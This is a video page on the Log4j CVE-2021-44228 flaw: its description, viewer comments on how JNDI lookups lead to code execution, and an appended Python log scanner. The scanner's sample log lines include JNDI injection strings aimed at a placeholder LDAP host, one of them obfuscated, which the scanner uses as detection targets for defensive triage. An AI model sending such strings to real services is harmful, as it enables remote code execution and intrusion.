Log4j (CVE-2021-44228) RCE Vulnerability Explained

315,533 views

Marcus Hutchins

2 years ago

Walking through how the log4j CVE-2021-44228 remote code execution vulnerability works and how it's exploited.

Comments: 257
@_JohnHammond 2 years ago
Great demonstration, Marcus!
@anuzravat 2 years ago
U got 1 subscriber
@seppy624 2 years ago
hey john
@Clytax 4 months ago
@anuzravat More like 1.2 million
@mint530 2 years ago
You saying "just came out a few days ago" makes it sound like a fun new game just got released haha
@MalwareTechBlog 2 years ago
Yeah lol, I just realized that 😂
@techutility 2 years ago
🤣🤣🤣🤣🤣
@-bubby9633 2 years ago
Tbf for us security professionals this is basically like a new game was just released 😂
@dipankarmitra3334 2 years ago
@-bubby9633 🤣🤣🤣
@OmprakashYadavIIT 2 years ago
😂😂
@devinmagee1948 2 years ago
It's my first week working in a cyber security environment professionally. Trying to get a grasp on my organization's infrastructure while trying to help with the log4j vuln has been a real trial by fire lol. Always enjoy your content!
@complexedone 2 years ago
I understand. I just joined a new org as part of the infrastructure team. I still don't know all our systems, but I'm learning fast as I help to find and patch systems as needed/available.
@jasrid04 2 years ago
Welcome to the industry and good luck!
@devinmagee1948 2 years ago
@complexedone Good luck. We will get there eventually!
@manfrombritain6816 2 years ago
what have you been doing to help? what's your role? i'm looking to start in security soon!
@jdemuro1 2 years ago
Best way to learn quickly though. This is a blessing in disguise for you!
@ltsmash9544 2 years ago
I love how you actually demonstrate the vulnerability and not just talk about it, like what most others are doing. Keep it up mate, you've got my Subscribe!
@zedzpan 2 years ago
Yup, learnt more from this than the over-engineered blogs I've been tracking!
@slaloulin8289 2 years ago
not to mention how he only did it in ~3 mins, saves a lot of time for such a great explanation
@brianrdetweiler 2 years ago
Clicking various links for 30 minutes, trying to understand the issue, and you explain it in less than 4. Thank you!
@badashgr8 2 years ago
With videos out there in 20+ mins and you here with less than 4 mins explaining it so clearly, I know which video to click on next time.
@AlphaZeroOmega 2 years ago
Thanks Marcus. I appreciate your ability to explain a vulnerability like this and demo it in a really understandable way.
@romanxyz7248 2 years ago
I had problems understanding this for days and you explained it in under 4 mins. You're amazing Marcus 👏❤️
@masettyvivek8155 2 years ago
This is one of the great demonstrations I have listened to on KZfaq. You are amazing!!
@andresromerodev 2 years ago
This explanation is so cool! I've been hearing about the vulnerability but nobody took the time to explain it this way. Thank you! :)
@Swing17 2 years ago
Very well explained. Good video Marcus!
@abhilpnYT 2 years ago
One of the best explanations with a practical demo. Thank you ..
@sniGGandBaShoR 2 years ago
the variable thing in a string is called string interpolation my dude!
@Svalbaz 2 years ago
I work in IT and the last week or two has been absolutely mental thanks to this
@lofman 2 years ago
"versatile" is the key word for this vulnerability. thanks for explaining! :)
@calmeidazim 2 years ago
Thank you Marcus, simple but quite clear to understand
@DavisTibbz 2 years ago
First time understanding what this means. Thanks.
@BSwitchGTG 2 years ago
Just started a new job, and moved my support area from networking to applications. Day 1 of the new gig and I was hearing it was all hands to deal with the "new vulnerability". Thankfully new enough that there was no headache for me to deal with, but oof, glad to see what they were up against!
@Burgundy_towel 2 years ago
Thanks for such a layman's explanation, I was able to grasp it..
@AM-og2oi 2 years ago
thank you for this video marcus!!! a lot of news on this and this has helped me get a better understanding of how the vulnerability functions
@53kt0r 2 years ago
Great video! plain, simple and without bias.
@zaitarh 2 years ago
The ${…} syntax is not part of Java - it's solely a Log4j syntax. (If it were part of Java there would have been no problem, as it would have been evaluated at compile-time, not run-time)
@marcellkovacs5452 2 years ago
@kpaxxapk6397 the logger should sanitise the input the same way an ORM sanitises model instance lookups to avoid SQL injection.
@zaitarh 2 years ago
@kpaxxapk6397 In theory, it's a fair point - it certainly would be possible to sanitize it. But 1) the documentation did not state this anywhere afaik and 2) no one is interested in having a logging framework where you have to sanitize everything. People just want to do "log.error("My error: {}", error)" and be done with it. I've used Log4j before some years ago, and never knew about that "Lookup" feature - and apparently I was not the only one. :) Imho, it was a very annoying feature, security flaw or not, as I don't want the text I log to sometimes be transformed into something else, just because it happens to contain "${" and "}"... And this undesirable feature was enabled by default...
@zaitarh 2 years ago
@kpaxxapk6397 Note: It would kind of be possible for Log4j to sanitize it itself... If they forced you to use it in a specific way... You CAN (but don't have to) use the logger as having a format string as first param, and then data-values for the rest of the params (similar to printf, etc)..: log.info("This is the format string. Data is {} and {}", data1, data2);
@fox2code 2 years ago
@zaitarh This RCE was a feature, not a bug, I saw the code, it was done intentionally, I'm sure someone added this feature on purpose to use it for what the video showed us.
@reemontel8036 2 years ago
No idea why I always assume the ${...} syntax is SpEL from the Spring SpEL syntax but I'm not 100% sure if that's correct or not
@kosmonautofficial296 2 years ago
Always cool to see a Marcus video out on a new vuln!
@strato_5459 2 years ago
good explanation. told exactly what it is and how it works. yeah i know what im looking at already but for anyone else that has no idea, this is the video they should watch
@YourWaifu0 2 years ago
Nice explanation, I believe showing how easy it is to do is the scary part more than anything since a lot of applications use log4j.
@tapion1998 2 years ago
I can't believe that it is that simple. The first thing you learn is always to control the input that is given. That is why you won't just take the given SQL command and execute it. To think that log4j didn't sanitise their input is just CRAZY. That's a one-liner, my god...
@razzeeee 2 years ago
Best summary yet
@GGdevelopment 2 years ago
Great job at presenting the vulnerability!
@DalBileAbas 5 months ago
Thanks for simplifying the vulnerability
@das_evoli 2 years ago
Finally no bullshitting around. Straight to the point and understandable for every novice programmer
@kotiwa 2 years ago
You made this very easy to understand. thanks!
@metrixc 2 years ago
Hi Marc, great video. If I see it right, the outbound connections to e.g. an LDAP server are always unencrypted since JNDI does regular (unencrypted) lookups. That means that companies could look for unexpected outbound LDAP requests to servers on the internet, right? Just curious. Would there be a way to make these outbound requests encrypted? Thank you!
@yodamaxwell 2 years ago
Fantastic demonstration!
@edgay 2 years ago
This 4 minute video was more clear and valuable than the 30-minute one I just watched on this RCE
@edgay 2 years ago
cough johnhammond cough
@FloresMenyapa 1 year ago
Greetings from Indonesia, I really admire you, and you are great. I'm just a beginner who wants to learn like you from the bottom
@TheBenJiles 2 years ago
Simple. To the point. Thanks man
@anonymous6666 2 years ago
great explanation and demo
@chess598 2 years ago
Concise and to the point, thanks!
@pjj1947 2 years ago
Thanks Marcus! Sweet and clean explanation!
@willemachternaam690 2 years ago
'Drop bobby tables' for Java. Nice! Thank you for this.
@jasonOfTheHills 2 years ago
Great explanation. And wow.
@imkir4n 2 years ago
clean explanation marcus!
@xl8373 2 years ago
Great demonstration, thank you!
@DaraulHarris 2 years ago
Subbed. That was an excellent explanation.
@mdzen22e 1 year ago
just what I am looking for....thx dude
@01071985hh 2 years ago
impactful explanation thanks
@manideepkumar959 2 years ago
Better than Java Brains' log4j explanation, now I understand
@TreeFrogOnATree 2 years ago
well, well that's really interesting thanks for uploading!
@TheGameIsOverCy 2 years ago
Nice explanation! Thank you :)
@freekdeman 2 years ago
Thanks, really helpful.
@ndenkha 2 years ago
Great video. Question, so is the problem that even though log4j stores that command string in a log file it gets executed while being written to the file?
@victorburnett6329 2 years ago
Wow, that is a pretty glaring vulnerability. Amazing it's only just been discovered.
@wcsoutdoors1393 2 years ago
I love your videos
@andreasMou123 2 years ago
nice demo, thanks!
@EnglishRain 2 years ago
Thank you for this!
@florian538 2 years ago
Could you solve this issue by looking for and commenting out the feature in the log4j library?
2 years ago
thanks for the explanation, going to make a documentary on this!
@tansanwastaken 2 years ago
Purchased botted sub account, ratio
@mandokir 2 years ago
Great, a whole documentary nobody asked for.
@kingKabali 2 years ago
Right to the point. Thanks man.
@tinkleondabeach 2 years ago
Thx daddy great explanation
@BirgerBurgerBargir 2 years ago
Great video
@cool-aquarian 2 years ago
when I try to do the same thing in my eclipse using log4j < 2.16, the jndi url is not getting invoked. It is simply printing in the log message.. Any clue why?
@krizanand 2 years ago
Pretty much every security team in an organization is stuck in a log4j meeting 😜 Wonderful explanation though of the exploit.
@paulkelly5618 2 years ago
Awesome video! Quick question: What is the symbol you have on line 11 of your code just after "logger.error(" but before "Hello..."
@corv882002 2 years ago
It says "s:" and is inserted by the IDE to let you know what the parameter's called
@philipjfry4465 2 years ago
parameter hinting
@thelineidk 2 years ago
And if I go to 2b2t from my phone, for example, will the exploit work on me? (I play Java Minecraft on my phone)
@redwaller1 2 years ago
Words cannot describe - how did this slip unnoticed? I cannot imagine writing code that would result in behavior like this, and yet it must surely be a trap even experienced developers might fall into.
@maxwellmapako3820 2 years ago
I honestly believe that you cannot cater for what you don't expect 🤣
@jayit6851 2 years ago
@maxwellmapako3820 This is like a classic example of unsanitized input. Idk how any experienced developer like those working with the Apache Foundation couldn't expect that.
@user-do6gr5ww5e 2 years ago
I was just thinking - this seems adjacent to our classic case of SQL injection. Crazy
@thexlr8rkid 2 years ago
This video is perfect
@WhiteSiroi 8 months ago
thank you, very helpful
@valentinpopescu6704 2 years ago
How can you set up the LDAP server on localhost and which port to choose?
@losthedgehog3922 2 years ago
Great. Now show the LDAP server configuration and how exactly it serves the Java object payload. None of the videos seem to explain how that works. They either evade it or use the marshalsec LDAP server, also never explaining how it works.
@peter11256 2 years ago
Great explanation. I just didn't quite understand one thing. Is it necessary for the object you are loading to exist in the LDAP server?
@isomeme 2 years ago
Yes, but as the attacker can point the lookup to an LDAP server they control, that's easy to arrange.
@Glitchflim 2 years ago
How to fix the issue, are there any steps?
@melkileo 2 years ago
It's quite a good video but I think you should have talked about the JNDI/LDAP breach that enables RCE. JNDI/LDAP basically doesn't allow injecting malicious code, but a breach from 2017 makes it possible to inject and initialize a custom Java class the LDAP server redirects to
@patco258 2 years ago
Great great great video
@ewerybody 2 years ago
Wasn't the base64 an extra indirection? The class you're loading can't pop Calc.exe directly? 🙄
@susulemons 2 years ago
how does an attacker make the call in the first place though? (have access to call the function with the string)
@MalwareTechBlog 2 years ago
By controlling some input that gets logged by the application
@logicfirst7959 2 years ago
You are the man Marcus, one thing though, how can I emulate this in my environment? I tried your commands and am getting "Error: Could not find or load main class Main".
@majorassault5074 2 years ago
I have to ask, what happens if you are running a VPN? Will the VPN's server get infected with whatever malware/ransomware/trojan/ddos/worm a black hat sends their way?
@freddyfozzyfilms2688 1 year ago
Can u also input a lambda?
@chickendumpling9595 2 years ago
I know I'm late to the party but I would greatly appreciate it if someone could clarify some things for me: 1) that error at the end, I can't quite catch it but I figure it must be due to the fact that the downloaded object cannot be concatenated without a toString method or something like that? 2) Isn't that base64 'calculator.exe' just a directory on your server, not part of the actual object? 3) what is that on line 8? Is setting that property necessary for this exploit to work? Again, I highly appreciate any response :)
@rommeljoven1046 2 years ago
Thanks for the demo. May I know what will be the parent process of "calc.exe"? Would it be "java.exe"?
@MalwareTechBlog 2 years ago
Yup, it'll be the Java VM
@bagzhansadvakassov1093 2 years ago
I wonder how many 0-day exploits are out there in open software.
@djvex6180 2 years ago
Thank you so much.
@tuananhtass3693 2 years ago
tks, Marcus!
@hellboykuro 2 years ago
hi can anyone help me, when i try to inject any executor in any game it says "This exploit is down while critical ace/rce vuln is fixed" this is on roblox btw
@danielblanchette8593 2 years ago
So you're telling me that the Log4j vulnerability is roughly the same as there was with Linux a while ago where if you put something like [{:}};} (don't remember the exact spelling) you can then enter a command that can be executed from an app, or the other thing that happened to Twitter where you could send a tweet that would retweet itself in your browser... Why is it always the same vulnerability that is found?
@MemesandLeague 2 years ago
@marcus Hutchins, I recently used your strategies from the pd64.exe video to dump some embedded DLLs from a trojan Google Chrome installer. Thanks for all the guidance!
@EdwardInTX 1 year ago
thank you!
@BruceDuncan 2 years ago
I still don't get it. What is it that is being returned over LDAP? Is it the base64-encoded string "calc.exe"? Is it a Java object which is doing Runtime.getRuntime().exec("calc.exe")? It's been nearly a week and I still don't get it!
@Robert-pt2jz 5 months ago
Hello, I am just curious. I have a statement and would like to know if my logic is correct. The vulnerability is caused due to no input checking in the program, allowing unintentional interaction with the user? Is this a correct way to view this or am I way off base?
@MH-oc4de 2 years ago
To be clear, it's the log4j logger that is doing the ${variable} expansion, and not the shell (?) e.g., if you print out username within the code it is not a problem, but log4j is (somehow) executing it? Thanks!
@MalwareTechBlog 2 years ago
Correct
@patrickmcevoy1776 2 years ago
Isn't 1.8 not vulnerable to the exploit though?
@universalperson 2 years ago
I actually worked with programs that use log4j, and found it clunky and cumbersome to use with the programs I was developing. I didn't know it was so widespread. So is this bug like that xkcd comic about Robert"); Drop Tables Students? Because it sounds like it.
@MolOlsson 2 years ago
More like xkcd 2347: Dependency. All modern infrastructure is built on a project someone thanklessly maintains in their free time :( And this vuln was known as far back as BlackHat 2016.
@demoniack81 2 years ago
How does one find log4j "cumbersome"? It's literally one jar and one .properties / .xml config file and off you go.
@universalperson 2 years ago
@demoniack81 it's been a while so I forgot the details, but whatever logging setup we had just did not work properly when we updated log4j, and a lot of the log messages had to be rewritten or changed just so the files would be generated and logged to. And my company had this overly complicated standard that log messages had to follow but didn't quite tell us how to make it display properly with log4j - when the older system was already doing so. So many bugs that were "this log is not displaying the error message properly", and I'd have to track down and fix it because there was some variable that needed updating.
@Scholz23 2 years ago
What coding tool are you using here? What do you recommend for people learning to code? It's very interesting watching everyone's reaction and discovery of this vulnerability.
@Joel-mx3oo 2 years ago
That's the IntelliJ IDE
@zaitarh 2 years ago
Loooove IntelliJ
@nid274 2 years ago
if you learn with gedit and terminal you will be like Superman growing up on Earth
@sergedeugoue2569 2 years ago
Maybe I'm overlooking things but it seems so obvious. How did this vulnerability take years to discover?
@sonalita_ 2 years ago
I'm still confused about how the jndi payload gets executed (i.e. calc.exe) in this case - isn't the jndi lookup just returning data? what is it that makes it actually execute calc.exe??? nobody seems to be able to explain this.
@arvidmildner6274 2 years ago
As I've understood it, it's basically a "hook" and the intended functionality of log4j which says: take this url, load the object/function there and run it. So the reason it is run is because that's how it was supposed to be. It's not the malicious code itself that says that it should be run. But I may be wrong here.
@53kt0r 2 years ago
To answer your question: yes. everything in here is data (even this video itself), eg: Y2FsYy5leGU= is calc.exe in base64, that is the resource being loaded through JNDI and passed to the log4j logger as a variable to be logged. I think that is clear enough, hopefully for you too. Cheers!
@lIlIllll1 2 years ago
what terminal thing are you using where you can see both the application code and terminal? (Im a noob dont yell LOL)
@nickpechie6951 2 years ago
that's the built-in terminal in IntelliJ
@TeamEmperor 2 years ago
Thank you
@jackofnotrades15 2 years ago
It's not a part of Java as somebody mentioned before. The syntax is kind of string interpolation though.
@CBMaster2 2 years ago
How has this just come out? Seems like a pretty straightforward exploit? Was it a new feature of log4j or something that has existed for a long time?
@jeremyFaden 2 years ago
Since 2013
@traxooza 2 years ago
Coming from a C++ background, I can't see why the code in "username" gets evaluated. Is it because log4j triggers this evaluation somehow? Why would it do that?
@scarletdice 2 years ago
correct, log4j evaluates the variable that is wrapped by ${...} (its own syntax for string interpolation). That, combined with some remote JNDI lookup mechanism within the library itself, a feature that they claimed was needed for backward compatibility purposes (??). Note that JNDI is a standard in Java that allows remote object load/lookup (!!).
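The lookup mechanism scarletdice describes above, together with metrixc's earlier question about spotting unexpected JNDI/LDAP activity, is something a defender can turn into a log-side check. The following is an added example and is not code from the video, from Marcus Hutchins, or from Log4j itself: a small Python normalizer that parses Log4j's `${prefix:value}` lookup syntax, resolves nested lookups inside-out (modelling only the documented `lower`, `upper` and `:-` default forms), and flags any line whose resolved lookup prefix is `jndi`. The sample log lines, the 203.0.113.7 address (a documentation range) and every function name are constructed for the example.

```python
"""Heuristic log-side detector for Log4j ${...} lookups that resolve to JNDI.

Added example for this thread; not code from the video, its author, or Log4j.
Only the documented lookup forms needed for normalization are modelled
(nesting, lower/upper, ":-" defaults); everything else is passed through.
"""
from typing import List, Tuple

# Constructed sample lines (not real traffic). 203.0.113.0/24 is a
# documentation range; the last field stands in for a logged User-Agent.
SAMPLE_LOG_LINES = [
    '10.0.0.5 "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 "GET /login HTTP/1.1" 200 "${jndi:ldap://203.0.113.7/a}"',
    '10.0.0.9 "GET / HTTP/1.1" 200 "${${lower:J}ndi:ldap://203.0.113.7/a}"',
    '10.0.0.12 "GET /app HTTP/1.1" 200 "price=${env:HOME:-none}"',
    'Order total: $12.50 for user {name}',
]


def _find_lookups(text: str) -> List[Tuple[int, int]]:
    """Return (start, end) spans of top-level ${...} groups, honouring nesting."""
    spans, depth, start, i = [], 0, -1, 0
    while i < len(text):
        if text.startswith("${", i):
            if depth == 0:
                start = i
            depth += 1
            i += 2
            continue
        if text[i] == "}" and depth > 0:
            depth -= 1
            if depth == 0:
                spans.append((start, i + 1))
        i += 1
    return spans


def resolve_lookup(body: str) -> str:
    """Resolve the inside of one ${...} group to the text it would yield.

    Nested groups are resolved first, so a prefix assembled from inner
    lookups collapses to its plain form before the prefix is inspected.
    """
    out, last = "", 0
    for s, e in _find_lookups(body):
        out += body[last:s] + resolve_lookup(body[s + 2:e - 1])
        last = e
    body = out + body[last:]
    prefix, sep, rest = body.partition(":")
    if not sep:
        return body                      # no prefix: plain text
    prefix = prefix.strip().lower()
    if prefix == "lower":
        return rest.lower()
    if prefix == "upper":
        return rest.upper()
    if prefix == "jndi":
        return body                      # keep "jndi:..." visible to callers
    if ":-" in rest:                     # unmodelled lookup with a default value
        return rest.split(":-", 1)[1]
    return body


def extract_lookups(line: str) -> List[str]:
    """All top-level lookups in a line, each resolved to its effective text."""
    return [resolve_lookup(line[s + 2:e - 1]) for s, e in _find_lookups(line)]


def is_jndi_lookup(line: str) -> bool:
    """True when any resolved lookup in the line starts with 'jndi:'."""
    return any(lk.lower().startswith("jndi:") for lk in extract_lookups(line))


def scan(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (line, resolved lookups) for every line that should be reviewed."""
    return [(line, extract_lookups(line)) for line in lines if is_jndi_lookup(line)]


if __name__ == "__main__":
    for line, lookups in scan(SAMPLE_LOG_LINES):
        print("REVIEW:", lookups, "<-", line)
```

Run on the constructed lines, the two lines carrying a lookup that resolves to `jndi:` are returned for review and the harmless `${env:...}` line is not. The check only works on the fields an application actually hands to the logger (usernames, headers, form values), so it belongs wherever those fields are captured, and it is a triage aid beside the upgrade the thread discusses, not a substitute for it.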